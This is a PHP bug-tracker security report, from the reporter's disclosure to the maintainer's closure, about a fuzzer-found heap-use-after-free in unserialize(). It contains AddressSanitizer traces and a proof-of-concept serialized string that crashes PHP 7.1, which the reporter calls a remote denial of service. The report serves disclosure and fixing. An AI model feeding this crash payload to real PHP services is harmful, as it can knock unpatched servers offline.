Sec Bug #74609 a heap-use-after-free was found at zif_unserialize function
Submitted: 2017-05-18 06:31 UTC Modified: 2017-08-12 13:14 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:0 of 0 (0.0%)
From: varsleak at gmail dot com Assigned:
Status: Duplicate Package: *General Issues
PHP Version: 7.1.6 OS: Ubuntu 1604 & Windows10
Private report: No CVE-ID: None
 [2017-05-18 06:31 UTC] varsleak at gmail dot com
Description:
------------
It was found by AFL.

Test script:
---------------
<?php
// Usage: php <this script> path/to/data
// Reads the crash input from the file given as the only argument and
// hands it to unserialize(), which is where the sanitizer report below fires.
if ($argc != 2) {
    echo $argv[0] . " path/to/data\n";
    return;
}

$poc = unserialize(file_get_contents($argv[1]));
?>

data:

Use 010editor to save this hex data to a file.

Expected result:
----------------
No crash.

Actual result:
--------------
USE_ZEND_ALLOC=1:

Warning: Class __PHP_Incomplete_Class has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7
ASAN:DEADLYSIGNAL
=================================================================
==27059==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000182452b bp 0x7ffcaab8b4d0 sp 0x7ffcaab8b320 T0)
==27059==The signal is caused by a READ memory access.
==27059==Hint: address points to the zero page.
    #0 0x182452a in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:671:2
    #1 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #2 0x182297c in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:822:7
    #3 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #4 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #5 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #6 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #7 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #8 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #9 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #10 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #11 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #12 0x181c0a3 in php_var_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:584:11
    #13 0x17c5584 in zif_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var.c:1114:7
    #14 0x1f20e1f in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:685:2
    #15 0x1d61b89 in execute_ex /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:432:7
    #16 0x1d6269c in zend_execute /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:478:2
    #17 0x1ba9081 in zend_execute_scripts /home/varsleak/github/fuzzy/php-src/Zend/zend.c:1476:4
    #18 0x18e8da6 in php_execute_script /home/varsleak/github/fuzzy/php-src/main/main.c:2537:14
    #19 0x208b394 in do_cli /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:993:5
    #20 0x2086f1d in main /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:1381:18
    #21 0x7fdf86dab82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #22 0x43c7d8 in _start (/home/varsleak/github/php-fuzzer/afl_php-7.1.3RC1+0x43c7d8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:671:2 in php_var_unserialize_internal
==27059==ABORTING


************************************************************************
USE_ZEND_ALLOC=0:

Warning: Class __PHP_Incomplete_Class has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7
ASAN:DEADLYSIGNAL
=================================================================
==27059==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000182452b bp 0x7ffcaab8b4d0 sp 0x7ffcaab8b320 T0)
==27059==The signal is caused by a READ memory access.
==27059==Hint: address points to the zero page.
    #0 0x182452a in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:671:2
    #1 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #2 0x182297c in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:822:7
    #3 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #4 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #5 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #6 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #7 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #8 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #9 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #10 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #11 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #12 0x181c0a3 in php_var_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:584:11
    #13 0x17c5584 in zif_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var.c:1114:7
    #14 0x1f20e1f in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:685:2
    #15 0x1d61b89 in execute_ex /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:432:7
    #16 0x1d6269c in zend_execute /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:478:2
    #17 0x1ba9081 in zend_execute_scripts /home/varsleak/github/fuzzy/php-src/Zend/zend.c:1476:4
    #18 0x18e8da6 in php_execute_script /home/varsleak/github/fuzzy/php-src/main/main.c:2537:14
    #19 0x208b394 in do_cli /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:993:5
    #20 0x2086f1d in main /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:1381:18
    #21 0x7fdf86dab82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #22 0x43c7d8 in _start (/home/varsleak/github/php-fuzzer/afl_php-7.1.3RC1+0x43c7d8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:671:2 in php_var_unserialize_internal
==27059==ABORTING
➜  unserialize_workdir USE_ZEND_ALLOC=0 ../afl_php-7.1.3RC1 fuzz_php.php.bak syncdir/fuzzer2/crashes/id:000000,sig:06,src:003387+001233,op:splice,rep:2 
=================================================================
==14446==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000019a28 at pc 0x000001826ed1 bp 0x7ffd7b3fac90 sp 0x7ffd7b3fac88
READ of size 1 at 0x612000019a28 thread T0
    #0 0x1826ed0 in zval_get_type /home/varsleak/github/fuzzy/php-src/Zend/zend_types.h:332:18
    #1 0x1826ed0 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:637
    #2 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #3 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #4 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #5 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #6 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #7 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #8 0x181c0a3 in php_var_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:584:11
    #9 0x17c5584 in zif_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var.c:1114:7
    #10 0x1f20e1f in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:685:2
    #11 0x1d61b89 in execute_ex /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:432:7
    #12 0x1d6269c in zend_execute /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:478:2
    #13 0x1ba9081 in zend_execute_scripts /home/varsleak/github/fuzzy/php-src/Zend/zend.c:1476:4
    #14 0x18e8da6 in php_execute_script /home/varsleak/github/fuzzy/php-src/main/main.c:2537:14
    #15 0x208b394 in do_cli /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:993:5
    #16 0x2086f1d in main /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:1381:18
    #17 0x7fd2393a582f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #18 0x43c7d8 in _start (/home/varsleak/github/php-fuzzer/afl_php-7.1.3RC1+0x43c7d8)

0x612000019a28 is located 104 bytes inside of 288-byte region [0x6120000199c0,0x612000019ae0)
freed by thread T0 here:
    #0 0x4f7380 in __interceptor_cfree.localalias.0 /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:55
    #1 0x1a6b764 in _efree /home/varsleak/github/fuzzy/php-src/Zend/zend_alloc.c:2428:4

previously allocated by thread T0 here:
    #0 0x4f7538 in __interceptor_malloc /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66
    #1 0x1a6c5b8 in __zend_malloc /home/varsleak/github/fuzzy/php-src/Zend/zend_alloc.c:2820:14

SUMMARY: AddressSanitizer: heap-use-after-free /home/varsleak/github/fuzzy/php-src/Zend/zend_types.h:332:18 in zval_get_type
Shadow bytes around the buggy address:
  0x0c247fffb2f0: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb300: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fffb310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fffb320: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb330: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x0c247fffb340: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
  0x0c247fffb350: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c247fffb360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==14446==ABORTING


History

 [2017-05-18 06:35 UTC] varsleak at gmail dot com
-Summary: a heap-buffer-overflow was found at zif_unserialize function +Summary: a heap-use-after-free was found at zif_unserialize function
 [2017-05-18 06:35 UTC] varsleak at gmail dot com
a heap-use-after-free vulnerability.
 [2017-05-18 06:56 UTC] whitehat002 at hotmail dot com
Is this the result of using the fuzz tool? How do you make sure it is a 'use after free' bug?
 [2017-05-18 10:16 UTC] varsleak at gmail dot com
This is the result of recompiling PHP-7.1.5 without modification:

➜  php-orig git:(PHP-7.1.5) ✗ ./configure --disable-shared --enable-static CFLAGS="-g -ggdb -fsanitize=address -fsanitize-coverage=trace-cmp,trace-pc-guard,indirect-calls" CXXFLAGS="-g -ggdb -fsanitize=address -fsanitize-coverage=trace-cmp,trace-pc-guard,indirect-calls" CC=clang CXX=clang++ LIBS="-lXpm"
➜  php-orig git:(PHP-7.1.5) ✗ USE_ZEND_ALLOC=0 sapi/cli/php ~/github/php-src-vul/heap-use-after-free/fuzzer.php ~/github/php-src-vul/heap-use-after-free/heap-use-after-free.data 
=================================================================
==29990==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000019d28 at pc 0x0000015f54b6 bp 0x7ffcb6c37360 sp 0x7ffcb6c37358
READ of size 1 at 0x612000019d28 thread T0
    #0 0x15f54b5 in zval_get_type /home/varsleak/github/php-orig/Zend/zend_types.h:332:18
    #1 0x15fa035 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:637:6
    #2 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #3 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #4 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #5 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #6 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #7 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #8 0x15f56d0 in php_var_unserialize /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:584:11
    #9 0x15b2944 in zif_unserialize /home/varsleak/github/php-orig/ext/standard/var.c:1114:7
    #10 0x1cafc1c in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:675:2
    #11 0x1b04811 in execute_ex /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:432:7
    #12 0x1b04f50 in zend_execute /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:474:2
    #13 0x196bb51 in zend_execute_scripts /home/varsleak/github/php-orig/Zend/zend.c:1476:4
    #14 0x16d1f22 in php_execute_script /home/varsleak/github/php-orig/main/main.c:2537:14
    #15 0x1e2ec61 in do_cli /home/varsleak/github/php-orig/sapi/cli/php_cli.c:993:5
    #16 0x1e2b6dc in main /home/varsleak/github/php-orig/sapi/cli/php_cli.c:1381:18
    #17 0x7f9c5985b82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #18 0x43c298 in _start (/home/varsleak/github/php-orig/sapi/cli/php+0x43c298)

0x612000019d28 is located 104 bytes inside of 288-byte region [0x612000019cc0,0x612000019de0)
freed by thread T0 here:
    #0 0x4f6e40 in __interceptor_cfree.localalias.0 /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:55
    #1 0x1864b39 in _efree /home/varsleak/github/php-orig/Zend/zend_alloc.c:2428:4
    #2 0x19df0af in zend_hash_do_resize /home/varsleak/github/php-orig/Zend/zend_hash.c:867:3
    #3 0x19c72c6 in _zend_hash_add_or_update_i /home/varsleak/github/php-orig/Zend/zend_hash.c:590:2
    #4 0x19c7cf0 in _zend_hash_add_new /home/varsleak/github/php-orig/Zend/zend_hash.c:637:9
    #5 0x160320c in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:440:13
    #6 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #7 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #8 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #9 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #10 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #11 0x15f56d0 in php_var_unserialize /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:584:11
    #12 0x15b2944 in zif_unserialize /home/varsleak/github/php-orig/ext/standard/var.c:1114:7
    #13 0x1cafc1c in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:675:2
    #14 0x1b04811 in execute_ex /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:432:7
    #15 0x1b04f50 in zend_execute /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:474:2
    #16 0x196bb51 in zend_execute_scripts /home/varsleak/github/php-orig/Zend/zend.c:1476:4
    #17 0x16d1f22 in php_execute_script /home/varsleak/github/php-orig/main/main.c:2537:14
    #18 0x1e2ec61 in do_cli /home/varsleak/github/php-orig/sapi/cli/php_cli.c:993:5
    #19 0x1e2b6dc in main /home/varsleak/github/php-orig/sapi/cli/php_cli.c:1381:18
    #20 0x7f9c5985b82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291

previously allocated by thread T0 here:
    #0 0x4f6ff8 in __interceptor_malloc /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66
    #1 0x186570b in __zend_malloc /home/varsleak/github/php-orig/Zend/zend_alloc.c:2820:14
    #2 0x186485e in _emalloc /home/varsleak/github/php-orig/Zend/zend_alloc.c:2413:11
    #3 0x19bcb5e in zend_hash_real_init_ex /home/varsleak/github/php-orig/Zend/zend_hash.c:138:3
    #4 0x19c1227 in zend_hash_check_init /home/varsleak/github/php-orig/Zend/zend_hash.c:161:3
    #5 0x19c6b8b in _zend_hash_add_or_update_i /home/varsleak/github/php-orig/Zend/zend_hash.c:551:3
    #6 0x19c81e7 in _zend_hash_str_update /home/varsleak/github/php-orig/Zend/zend_hash.c:651:14
    #7 0x15c567e in php_store_class_name /home/varsleak/github/php-orig/ext/standard/incomplete_class.c:159:2
    #8 0x15fd62f in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:985:3
    #9 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #10 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #11 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #12 0x15f56d0 in php_var_unserialize /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:584:11
    #13 0x15b2944 in zif_unserialize /home/varsleak/github/php-orig/ext/standard/var.c:1114:7
    #14 0x1cafc1c in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:675:2
    #15 0x1b04811 in execute_ex /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:432:7
    #16 0x1b04f50 in zend_execute /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:474:2
    #17 0x196bb51 in zend_execute_scripts /home/varsleak/github/php-orig/Zend/zend.c:1476:4
    #18 0x16d1f22 in php_execute_script /home/varsleak/github/php-orig/main/main.c:2537:14
    #19 0x1e2ec61 in do_cli /home/varsleak/github/php-orig/sapi/cli/php_cli.c:993:5
    #20 0x1e2b6dc in main /home/varsleak/github/php-orig/sapi/cli/php_cli.c:1381:18
    #21 0x7f9c5985b82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291

SUMMARY: AddressSanitizer: heap-use-after-free /home/varsleak/github/php-orig/Zend/zend_types.h:332:18 in zval_get_type
Shadow bytes around the buggy address:
  0x0c247fffb350: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb360: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fffb370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fffb380: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb390: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x0c247fffb3a0: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
  0x0c247fffb3b0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c247fffb3c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb3d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb3e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb3f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==29990==ABORTING
 [2017-06-09 09:50 UTC] varsleak at gmail dot com
-Operating System: Test on Ubuntu 16.04 x64 +Operating System: Ubuntu 1604 & Windows10 -PHP Version: 7.1.5 +PHP Version: 7.1.6
 [2017-06-09 09:50 UTC] varsleak at gmail dot com
Add new PoC:
<?php
    $crashed_data ='O:9:"AAAAAAAAA":1:0S:1:"0";a:15:{s:8:"AAAAAAAA";i:-0;s:1:"m";i:0;s:1:"d";i:0;s:1:"i";i:00;s:1:"i";i:1;s:1:"s";i:-6;s:1:"0";d:1;s:1:"i";R:07;i:0;a:1:{i:0;r:6;}i:1;a:123:{s:1:"y";i:2;s:8:"AAAAAAAA";i:0;s:1:"d";i:2;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:8:"AAAAAAAA";d:000;s:1:"i";i:10;s:1:"s";i:-6;s:1:"0";d:1;s:1:"i";R:07;i:0;a:1:{i:0;r:6;}i:1;a:200000000000000000000000000000000:{s:1:"y";i:2;s:1:"A";i:0;s:1:"d";i:2;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"d";i:2;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:2:"Ad";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:2;s:1:"A";i:0;s:1:"d";i:2;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"s";i:-6;s:1:"0";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:1;s:1:"s";d:1;s:1:"2";R:+7;s:1:"s";i:-6;s:1:"y";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:20;s:1:"A";i:0;s:1:"d";i:2;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:7:"0010day";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:20;s:1:"1";i:0;s:1:"d";i:2;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"
6";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"3";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:7:"-000day";d:1;s:1:"i";R:+7;s:1:"s";i:6;s:7:"-000day";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"s";i:-6;s:2:"0y";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:20;s:1:"A";';
    unserialize($crashed_data);
?>
 [2017-08-04 10:28 UTC] varsleak at gmail dot com
-Type: Bug +Type: Security -Private report: No +Private report: Yes
 [2017-08-04 10:28 UTC] varsleak at gmail dot com
It will cause a Remote Denial of Service vulnerability.
 [2017-08-12 13:14 UTC] nikic@php.net
-Status: Open +Status: Duplicate
 [2017-08-12 13:14 UTC] nikic@php.net
This is a duplicate of bug #74103, which is now fixed.
Last updated: Sun Sep 23 06:01:25 2018 UTC